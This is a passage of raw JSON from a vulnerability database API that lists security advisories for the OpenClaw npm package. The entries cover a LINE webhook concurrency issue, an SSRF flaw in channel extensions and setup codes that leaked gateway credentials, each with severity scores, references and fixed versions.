4s-jnn3-1kd8"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/openclaw@2026.4.8"}],"aliases":["CVE-2026-42431","GHSA-cmfr-9m2r-xwhq"],"risk_score":3.6,"exploitability":"0.5","weighted_severity":"7.3","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-ma62-gtan-97au"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/90122?format=json","vulnerability_id":"VCID-mcz5-wgu1-z7g7","summary":"OpenClaw: LINE webhook handler lacks shared pre-auth concurrency budget before signature verification\n## Summary\nLINE webhook handler lacks shared pre-auth concurrency budget before signature verification\n\n## Current Maintainer Triage\n- Status: open\n- Normalized severity: low\n- Assessment: Shipped 
v2026.3.28 lacks a shared pre-auth concurrency budget on the public LINE webhook path, but the effect is bounded transient availability loss only, so low fits.\n\n## Affected Packages / Versions\n- Package: `openclaw` (npm)\n- Latest published npm version: `2026.3.31`\n- Vulnerable version range: `<=2026.3.28`\n- Patched versions: `>= 2026.3.31`\n- First stable tag containing the fix: `v2026.3.31`\n\n## Fix Commit(s)\n- `57c47d8c7fbf5a2e70cc4dec2380977968903cad` — 2026-03-31T19:34:25+09:00\n\nOpenClaw thanks @nexrin for reporting.","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2026-41343","reference_id":"","reference_type":"","scores":[{"value":"0.0015","scoring_system":"epss","scoring_elements":"0.35317","published_at":"2026-06-05T12:55:00Z"},{"value":"0.0015","scoring_system":"epss","scoring_elements":"0.35292","published_at":"2026-06-07T12:55:00Z"},{"value":"0.0015","scoring_system":"epss","scoring_elements":"0.35328","published_at":"2026-06-06T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2026-41343"},{"reference_url":"https://github.com/openclaw/openclaw","reference_id":"","reference_type":"","scores":[{"value":"5.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L"},{"value":"6.9","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw"},{"reference_url":"https://github.com/openclaw/openclaw/commit/57c47d8c7fbf5a2e70cc4dec2380977968903cad","reference_id":"","reference_type":"","scores":[{"value":"5.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L"},{"value":"6.9","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},
{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:Y/T:P/P:M/B:A/M:M/D:T/2026-04-24T14:30:05Z/"}],"url":"https://github.com/openclaw/openclaw/commit/57c47d8c7fbf5a2e70cc4dec2380977968903cad"},{"reference_url":"https://github.com/openclaw/openclaw/releases/tag/v2026.3.31","reference_id":"","reference_type":"","scores":[{"value":"5.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L"},{"value":"6.9","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw/releases/tag/v2026.3.31"},{"reference_url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-qcc3-jqwp-5vh2","reference_id":"","reference_type":"","scores":[{"value":"5.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L"},{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"6.9","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:Y/T:P/P:M/B:A/M:M/D:T/2026-04-24T14:30:05Z/"}],"url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-qcc3-jqwp-5vh2"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2026-41343","reference_id":"","reference_type":"","scores":[{"value":"5.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L"},{"value":"6.9","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-41343"},{"reference_url":"https://www.vulncheck.com
/advisories/openclaw-denial-of-service-via-line-webhook-handler-pre-auth-concurrency","reference_id":"","reference_type":"","scores":[{"value":"5.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L"},{"value":"6.9","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:Y/T:P/P:M/B:A/M:M/D:T/2026-04-24T14:30:05Z/"}],"url":"https://www.vulncheck.com/advisories/openclaw-denial-of-service-via-line-webhook-handler-pre-auth-concurrency"},{"reference_url":"https://github.com/advisories/GHSA-qcc3-jqwp-5vh2","reference_id":"GHSA-qcc3-jqwp-5vh2","reference_type":"","scores":[{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-qcc3-jqwp-5vh2"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/109907?format=json","purl":"pkg:npm/openclaw@2026.3.31","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-1pbz-8rnx-dkhe"},{"vulnerability":"VCID-258k-a4dw-tfae"},{"vulnerability":"VCID-29a1-7ar7-67e1"},{"vulnerability":"VCID-2c8p-gbaw-3ye4"},{"vulnerability":"VCID-2h6a-becf-x7ej"},{"vulnerability":"VCID-2khh-wv8p-97ff"},{"vulnerability":"VCID-2mxq-krq5-bycx"},{"vulnerability":"VCID-356u-h788-pkgt"},{"vulnerability":"VCID-3xmj-n798-x3cw"},{"vulnerability":"VCID-3zwq-dz2u-pqgv"},{"vulnerability":"VCID-4316-7q9a-xuhx"},{"vulnerability":"VCID-4u3z-rs45-gbhe"},{"vulnerability":"VCID-4urc-4536-pqhk"},{"vulnerability":"VCID-6wth-qthz-yud8"},{"vulnerability":"VCID-6y5w-am4s-6qa5"},{"vulnerability":"VCID-733f-57ds-xugm"},{"vulnerability":"VCID-73cz-n29z-uqem"},{"vulnerability":"VCID-75yr-sbce-nkah"},{"vulnerability":"VCID-7akj-469t-57hz"},{"vulnerability":"VCID-7ntr-5dr5-9uf8"},{"vulnerability":"VCID-7snr-fn3u-x3b8"},{"vulnerability":"VC
ID-7z2s-k6ty-ekg1"},{"vulnerability":"VCID-96jd-x87b-s3ey"},{"vulnerability":"VCID-9hcd-uj62-8yeu"},{"vulnerability":"VCID-9kgh-wj9w-ykff"},{"vulnerability":"VCID-9xgq-vtg2-jucq"},{"vulnerability":"VCID-a46u-tnbh-fyhs"},{"vulnerability":"VCID-a4jz-y9s4-zkfg"},{"vulnerability":"VCID-arks-g6hw-abbw"},{"vulnerability":"VCID-bgwh-spue-yybk"},{"vulnerability":"VCID-bkya-73v8-bber"},{"vulnerability":"VCID-c25h-khws-2fc3"},{"vulnerability":"VCID-cbuu-4d6c-rben"},{"vulnerability":"VCID-d8v2-gft5-buee"},{"vulnerability":"VCID-dfdk-dhwf-9yaj"},{"vulnerability":"VCID-dmse-bb22-rkcj"},{"vulnerability":"VCID-dv5s-pvw1-a7fu"},{"vulnerability":"VCID-e25p-j5ed-yqfz"},{"vulnerability":"VCID-e4ac-qm17-qbf5"},{"vulnerability":"VCID-fuda-zxu8-gbb4"},{"vulnerability":"VCID-gk95-28x9-17dk"},{"vulnerability":"VCID-gkyv-ahk7-1ud3"},{"vulnerability":"VCID-haxd-ps1x-h3ch"},{"vulnerability":"VCID-hz33-9efv-c7ef"},{"vulnerability":"VCID-jshg-1pb2-wbak"},{"vulnerability":"VCID-k8s8-zjv4-gqdb"},{"vulnerability":"VCID-kcy2-a98b-uyg7"},{"vulnerability":"VCID-kxmf-d7w1-xfcv"},{"vulnerability":"VCID-ma62-gtan-97au"},{"vulnerability":"VCID-mszk-dr24-xugw"},{"vulnerability":"VCID-mv8b-cryt-u3g8"},{"vulnerability":"VCID-mxu5-yjqs-nuap"},{"vulnerability":"VCID-nkh4-j2pe-1qhr"},{"vulnerability":"VCID-ns77-4wfj-9ka6"},{"vulnerability":"VCID-ntwt-jkgr-sffu"},{"vulnerability":"VCID-nv6g-7gs9-pfan"},{"vulnerability":"VCID-nw4r-wjgs-8qc1"},{"vulnerability":"VCID-p7gx-9usz-yyew"},{"vulnerability":"VCID-p7v5-jqhq-nbhz"},{"vulnerability":"VCID-p8xd-2um4-9ufr"},{"vulnerability":"VCID-pae5-uyu7-k3c1"},{"vulnerability":"VCID-pdmd-a4fg-8fcg"},{"vulnerability":"VCID-pj41-sunw-vbcj"},{"vulnerability":"VCID-psms-gauf-tkbz"},{"vulnerability":"VCID-q6ne-sw1r-xkd1"},{"vulnerability":"VCID-qedr-a3ay-v3gx"},{"vulnerability":"VCID-qjss-tvgk-3ubk"},{"vulnerability":"VCID-r5bw-c2py-9udf"},{"vulnerability":"VCID-rr6t-1193-ybgz"},{"vulnerability":"VCID-ry1r-br3q-2uaw"},{"vulnerability":"VCID-t2ve-xemk-mqa9"},{"vulnerability":"VC
ID-t2yy-9ume-t7be"},{"vulnerability":"VCID-una1-gxkk-t3bp"},{"vulnerability":"VCID-v9cd-65tf-p3f8"},{"vulnerability":"VCID-vfbb-bpy9-87ey"},{"vulnerability":"VCID-vy8v-np82-r3b5"},{"vulnerability":"VCID-vz7k-r7c4-ebfg"},{"vulnerability":"VCID-w2tj-nqa6-cuam"},{"vulnerability":"VCID-w4p1-sxdg-hyha"},{"vulnerability":"VCID-w58d-6veg-uugy"},{"vulnerability":"VCID-wmr3-83u3-6qdb"},{"vulnerability":"VCID-wyce-qxau-mqff"},{"vulnerability":"VCID-x2ru-ydpv-f3ah"},{"vulnerability":"VCID-xfgw-ua7r-abbr"},{"vulnerability":"VCID-xj73-kszs-yygp"},{"vulnerability":"VCID-xnvm-rp36-vyaj"},{"vulnerability":"VCID-xsct-xjs7-nbab"},{"vulnerability":"VCID-y65g-4baa-a7c2"},{"vulnerability":"VCID-y7sd-j9xn-qffs"},{"vulnerability":"VCID-ye4t-n6r3-67ab"},{"vulnerability":"VCID-yhpq-5qy3-y7bn"},{"vulnerability":"VCID-ymmv-2qmq-6kap"},{"vulnerability":"VCID-z8mj-pnbe-wqej"},{"vulnerability":"VCID-zg68-u5b5-vkft"},{"vulnerability":"VCID-zpte-tgt5-wqcm"},{"vulnerability":"VCID-zu4s-jnn3-1kd8"},{"vulnerability":"VCID-zunq-wnnf-k3fw"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/openclaw@2026.3.31"}],"aliases":["CVE-2026-41343","GHSA-qcc3-jqwp-5vh2"],"risk_score":3.1,"exploitability":"0.5","weighted_severity":"6.2","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-mcz5-wgu1-z7g7"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/89346?format=json","vulnerability_id":"VCID-mggy-bv5s-5uax","summary":"Duplicate Advisory: OpenClaw: SSRF via Unguarded Configured Base URLs in Multiple Channel Extensions (Incomplete Fix for CVE-2026-28476)\n### Duplicate Advisory\nThis advisory has been withdrawn because it is a duplicate of GHSA-rhfg-j8jq-7v2h. This link is maintained to preserve external references.\n\n### Original Description\nOpenClaw before 2026.3.25 contains a server-side request forgery vulnerability in multiple channel extensions that fail to properly guard configured base URLs against SSRF attacks. 
Attackers can exploit unprotected fetch() calls against configured endpoints to rebind requests to blocked internal destinations and access restricted resources.","references":[{"reference_url":"https://github.com/openclaw/openclaw/commit/f92c92515bd439a71bd03eb1bc969c1964f17acf","reference_id":"","reference_type":"","scores":[{"value":"7.4","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:L"},{"value":"5.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:N/VI:L/VA:N/SC:L/SI:L/SA:L/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw/commit/f92c92515bd439a71bd03eb1bc969c1964f17acf"},{"reference_url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-rhfg-j8jq-7v2h","reference_id":"","reference_type":"","scores":[{"value":"7.4","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:L"},{"value":"5.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:N/VI:L/VA:N/SC:L/SI:L/SA:L/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-rhfg-j8jq-7v2h"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2026-35629","reference_id":"","reference_type":"","scores":[{"value":"7.4","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:L"},{"value":"5.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:N/VI:L/VA:N/SC:L/SI:L/SA:L/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X"},{"value":"MODERATE","scoring_s
ystem":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-35629"},{"reference_url":"https://www.vulncheck.com/advisories/openclaw-server-side-request-forgery-via-unguarded-configured-base-urls-in-channel-extensions","reference_id":"","reference_type":"","scores":[{"value":"7.4","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:L"},{"value":"5.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:N/VI:L/VA:N/SC:L/SI:L/SA:L/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://www.vulncheck.com/advisories/openclaw-server-side-request-forgery-via-unguarded-configured-base-urls-in-channel-extensions"},{"reference_url":"https://github.com/advisories/GHSA-8j7f-g9gv-7jhc","reference_id":"GHSA-8j7f-g9gv-7jhc","reference_type":"","scores":[{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-8j7f-g9gv-7jhc"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/109863?format=json","purl":"pkg:npm/openclaw@2026.3.28","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-1j3m-fecr-f7cn"},{"vulnerability":"VCID-1p5p-eth5-3ufu"},{"vulnerability":"VCID-1pbz-8rnx-dkhe"},{"vulnerability":"VCID-258k-a4dw-tfae"},{"vulnerability":"VCID-26kp-dbu2-pqej"},{"vulnerability":"VCID-26sg-e29u-hkf3"},{"vulnerability":"VCID-29a1-7ar7-67e1"},{"vulnerability":"VCID-2c8p-gbaw-3ye4"},{"vulnerability":"VCID-2h6a-becf-x7ej"},{"vulnerability":"VCID-2khh-wv8p-97ff"},{"vulnerability":"VCID-2mxq-krq5-bycx"},{"vulnerability":"VCID-2uqu-k42d-1baq"},{"vulnerability":"VCID-2wr9-h42m-a7ev"},{"vulnerability":"VCID-356u-h788-pkgt"},{"vulnerability":"VCID-38g8-39ek-xbat"},{"vulnerability":"VCID-3wsw-d4z2-dydt"},{"vulnerability":"VCID-3xmj-n798-x3cw"
},{"vulnerability":"VCID-3zwq-dz2u-pqgv"},{"vulnerability":"VCID-3zx4-t8cj-kbfn"},{"vulnerability":"VCID-4316-7q9a-xuhx"},{"vulnerability":"VCID-4hz5-f2pw-3yb4"},{"vulnerability":"VCID-4u3z-rs45-gbhe"},{"vulnerability":"VCID-4urc-4536-pqhk"},{"vulnerability":"VCID-5rgx-2krs-guck"},{"vulnerability":"VCID-6wth-qthz-yud8"},{"vulnerability":"VCID-6y5w-am4s-6qa5"},{"vulnerability":"VCID-733f-57ds-xugm"},{"vulnerability":"VCID-73cz-n29z-uqem"},{"vulnerability":"VCID-75yr-sbce-nkah"},{"vulnerability":"VCID-7akj-469t-57hz"},{"vulnerability":"VCID-7dyw-9b37-yqh4"},{"vulnerability":"VCID-7ntr-5dr5-9uf8"},{"vulnerability":"VCID-7snr-fn3u-x3b8"},{"vulnerability":"VCID-7wmr-v7zb-6fc9"},{"vulnerability":"VCID-7z2s-k6ty-ekg1"},{"vulnerability":"VCID-96jd-x87b-s3ey"},{"vulnerability":"VCID-9hcd-uj62-8yeu"},{"vulnerability":"VCID-9kgh-wj9w-ykff"},{"vulnerability":"VCID-9xgq-vtg2-jucq"},{"vulnerability":"VCID-9xrt-mv81-3yc8"},{"vulnerability":"VCID-a2wx-7b8h-c3h1"},{"vulnerability":"VCID-a46u-tnbh-fyhs"},{"vulnerability":"VCID-a4jz-y9s4-zkfg"},{"vulnerability":"VCID-arks-g6hw-abbw"},{"vulnerability":"VCID-axp9-mt9z-gkgw"},{"vulnerability":"VCID-b9w3-w2nq-cqg6"},{"vulnerability":"VCID-bgwh-spue-yybk"},{"vulnerability":"VCID-bkya-73v8-bber"},{"vulnerability":"VCID-c25h-khws-2fc3"},{"vulnerability":"VCID-c4yt-z48z-zygv"},{"vulnerability":"VCID-c76v-4577-n7c6"},{"vulnerability":"VCID-carm-gpgh-wbbf"},{"vulnerability":"VCID-cbuu-4d6c-rben"},{"vulnerability":"VCID-cvmw-sxfq-dyhz"},{"vulnerability":"VCID-d8v2-gft5-buee"},{"vulnerability":"VCID-da47-zdf1-mfgf"},{"vulnerability":"VCID-dfdk-dhwf-9yaj"},{"vulnerability":"VCID-dmse-bb22-rkcj"},{"vulnerability":"VCID-dv5s-pvw1-a7fu"},{"vulnerability":"VCID-e25p-j5ed-yqfz"},{"vulnerability":"VCID-e4ac-qm17-qbf5"},{"vulnerability":"VCID-fekn-d6f3-xfa6"},{"vulnerability":"VCID-fuda-zxu8-gbb4"},{"vulnerability":"VCID-g3hg-peh1-tudm"},{"vulnerability":"VCID-g8r6-x6s5-uydq"},{"vulnerability":"VCID-gk95-28x9-17dk"},{"vulnerability":"VCID-gkyv-ahk7-1ud3"
},{"vulnerability":"VCID-haxd-ps1x-h3ch"},{"vulnerability":"VCID-hd4w-s3dp-nubj"},{"vulnerability":"VCID-hz33-9efv-c7ef"},{"vulnerability":"VCID-j8fb-fhyc-33fu"},{"vulnerability":"VCID-jdqk-kv8u-xqa9"},{"vulnerability":"VCID-jshg-1pb2-wbak"},{"vulnerability":"VCID-k8s8-zjv4-gqdb"},{"vulnerability":"VCID-kcy2-a98b-uyg7"},{"vulnerability":"VCID-kxmf-d7w1-xfcv"},{"vulnerability":"VCID-kzgh-7f6h-kfd1"},{"vulnerability":"VCID-ma62-gtan-97au"},{"vulnerability":"VCID-mcz5-wgu1-z7g7"},{"vulnerability":"VCID-mszk-dr24-xugw"},{"vulnerability":"VCID-mv8b-cryt-u3g8"},{"vulnerability":"VCID-mxu5-yjqs-nuap"},{"vulnerability":"VCID-nkh4-j2pe-1qhr"},{"vulnerability":"VCID-ns77-4wfj-9ka6"},{"vulnerability":"VCID-ntwt-jkgr-sffu"},{"vulnerability":"VCID-nv6g-7gs9-pfan"},{"vulnerability":"VCID-nw4r-wjgs-8qc1"},{"vulnerability":"VCID-p7gx-9usz-yyew"},{"vulnerability":"VCID-p7me-4bzz-83cm"},{"vulnerability":"VCID-p7v5-jqhq-nbhz"},{"vulnerability":"VCID-p8xd-2um4-9ufr"},{"vulnerability":"VCID-pae5-uyu7-k3c1"},{"vulnerability":"VCID-pdmd-a4fg-8fcg"},{"vulnerability":"VCID-psms-gauf-tkbz"},{"vulnerability":"VCID-q6ne-sw1r-xkd1"},{"vulnerability":"VCID-q9jf-srt4-fbcg"},{"vulnerability":"VCID-qedr-a3ay-v3gx"},{"vulnerability":"VCID-qjss-tvgk-3ubk"},{"vulnerability":"VCID-r5bw-c2py-9udf"},{"vulnerability":"VCID-rr6t-1193-ybgz"},{"vulnerability":"VCID-ry1r-br3q-2uaw"},{"vulnerability":"VCID-s3wz-3yzf-ybhz"},{"vulnerability":"VCID-sja9-6t41-hud8"},{"vulnerability":"VCID-t2ve-xemk-mqa9"},{"vulnerability":"VCID-t2yy-9ume-t7be"},{"vulnerability":"VCID-t991-75e7-ykdv"},{"vulnerability":"VCID-una1-gxkk-t3bp"},{"vulnerability":"VCID-uy97-p1ex-y7df"},{"vulnerability":"VCID-v9cd-65tf-p3f8"},{"vulnerability":"VCID-vfbb-bpy9-87ey"},{"vulnerability":"VCID-vktg-77tu-vycv"},{"vulnerability":"VCID-vx5d-3d98-7kf3"},{"vulnerability":"VCID-vy8v-np82-r3b5"},{"vulnerability":"VCID-vz7k-r7c4-ebfg"},{"vulnerability":"VCID-w2tj-nqa6-cuam"},{"vulnerability":"VCID-w4p1-sxdg-hyha"},{"vulnerability":"VCID-w58d-6veg-uugy"
},{"vulnerability":"VCID-watb-49vx-yub1"},{"vulnerability":"VCID-wmr3-83u3-6qdb"},{"vulnerability":"VCID-wx44-n3fr-skah"},{"vulnerability":"VCID-wyce-qxau-mqff"},{"vulnerability":"VCID-x2ru-ydpv-f3ah"},{"vulnerability":"VCID-x4hn-ygbg-mkep"},{"vulnerability":"VCID-x794-wfnf-1ugf"},{"vulnerability":"VCID-x7uw-s9a6-fybd"},{"vulnerability":"VCID-xfgw-ua7r-abbr"},{"vulnerability":"VCID-xj73-kszs-yygp"},{"vulnerability":"VCID-xnvm-rp36-vyaj"},{"vulnerability":"VCID-xryt-a83q-q7et"},{"vulnerability":"VCID-xsct-xjs7-nbab"},{"vulnerability":"VCID-xvhd-w4tv-tqhr"},{"vulnerability":"VCID-xz8s-hj5s-wfgj"},{"vulnerability":"VCID-xzg5-ren5-p7gw"},{"vulnerability":"VCID-y65g-4baa-a7c2"},{"vulnerability":"VCID-y7sd-j9xn-qffs"},{"vulnerability":"VCID-ye4t-n6r3-67ab"},{"vulnerability":"VCID-yhpq-5qy3-y7bn"},{"vulnerability":"VCID-ykwt-tdpa-3bft"},{"vulnerability":"VCID-ymmv-2qmq-6kap"},{"vulnerability":"VCID-ynup-4v9e-tbh4"},{"vulnerability":"VCID-yp2w-pc58-9bf6"},{"vulnerability":"VCID-ywrn-52gx-f3ad"},{"vulnerability":"VCID-z7wa-tw2t-vqas"},{"vulnerability":"VCID-z8mj-pnbe-wqej"},{"vulnerability":"VCID-zb5t-hhkm-kfeh"},{"vulnerability":"VCID-zg68-u5b5-vkft"},{"vulnerability":"VCID-zkum-rn42-yyfs"},{"vulnerability":"VCID-zpte-tgt5-wqcm"},{"vulnerability":"VCID-zu4s-jnn3-1kd8"},{"vulnerability":"VCID-zunq-wnnf-k3fw"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/openclaw@2026.3.28"}],"aliases":["GHSA-8j7f-g9gv-7jhc"],"risk_score":3.4,"exploitability":"0.5","weighted_severity":"6.7","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-mggy-bv5s-5uax"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/91827?format=json","vulnerability_id":"VCID-mkka-hf2q-pfhp","summary":"OpenClaw: Pairing setup codes exposed long-lived shared gateway credentials instead of short-lived bootstrap tokens\n### Summary\n\nOpenClaw pairing setup codes generated by `/pair` and `openclaw qr` embedded the configured shared gateway token or password directly in 
the setup payload. Anyone who obtained that code from chat history, logs, screenshots, or copied QR payloads could recover the long-lived shared credential.\n\n### Impact\n\nAn attacker with access to a leaked setup code could reuse the shared gateway credential outside the intended one-time pairing flow.\n\n### Affected versions\n\n`openclaw` `<= 2026.3.11`\n\n### Patch\n\nFixed in `openclaw` `2026.3.12`. Setup codes now carry short-lived bootstrap tokens that are only valid for the initial device bootstrap exchange. Update to `2026.3.12` or later and rotate any previously exposed shared gateway credentials if setup codes may have leaked.","references":[{"reference_url":"https://github.com/openclaw/openclaw","reference_id":"","reference_type":"","scores":[{"value":"6.9","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw"},{"reference_url":"https://github.com/openclaw/openclaw/releases/tag/v2026.3.12","reference_id":"","reference_type":"","scores":[{"value":"6.9","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw/releases/tag/v2026.3.12"},{"reference_url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-7h7g-x2px-94hj","reference_id":"","reference_type":"","scores":[{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"6.9","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-7h7g-x2px-94hj"},{"reference_url":"https://github.com/advisories/GHSA-7h7g-x2px-94hj
","reference_id":"GHSA-7h7g-x2px-94hj","reference_type":"","scores":[{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-7h7g-x2px-94hj"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/112780?format=json","purl":"pkg:npm/openclaw@2026.3.12","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-11dg-bvft-6kb1"},{"vulnerability":"VCID-1728-wc17-dud6"},{"vulnerability":"VCID-1j3m-fecr-f7cn"},{"vulnerability":"VCID-1kk2-t48u-zkb2"},{"vulnerability":"VCID-1p3b-pfnn-x7ad"},{"vulnerability":"VCID-1p5p-eth5-3ufu"},{"vulnerability":"VCID-1pbz-8rnx-dkhe"},{"vulnerability":"VCID-1smq-mbty-jkaj"},{"vulnerability":"VCID-1ufd-uuqk-nbdv"},{"vulnerability":"VCID-24eb-5jt8-aueq"},{"vulnerability":"VCID-24m7-jx1g-hqde"},{"vulnerability":"VCID-258k-a4dw-tfae"},{"vulnerability":"VCID-26kp-dbu2-pqej"},{"vulnerability":"VCID-26sg-e29u-hkf3"},{"vulnerability":"VCID-26sv-grsd-abcw"},{"vulnerability":"VCID-294z-6z8j-97bx"},{"vulnerability":"VCID-29a1-7ar7-67e1"},{"vulnerability":"VCID-2c8p-gbaw-3ye4"},{"vulnerability":"VCID-2h6a-becf-x7ej"},{"vulnerability":"VCID-2hca-3v8f-f3e8"},{"vulnerability":"VCID-2khh-wv8p-97ff"},{"vulnerability":"VCID-2mxq-krq5-bycx"},{"vulnerability":"VCID-2uqu-k42d-1baq"},{"vulnerability":"VCID-2v8n-mnws-jfc9"},{"vulnerability":"VCID-2wr9-h42m-a7ev"},{"vulnerability":"VCID-32zs-2zs9-uufs"},{"vulnerability":"VCID-356u-h788-pkgt"},{"vulnerability":"VCID-37ep-9smd-zuh9"},{"vulnerability":"VCID-384t-z1h8-pfft"},{"vulnerability":"VCID-38g8-39ek-xbat"},{"vulnerability":"VCID-3bdd-a9nw-13bn"},{"vulnerability":"VCID-3pqp-bneb-mbc4"},{"vulnerability":"VCID-3qbe-dsde-p7dz"},{"vulnerability":"VCID-3wsw-d4z2-dydt"},{"vulnerability":"VCID-3xeb-phgc-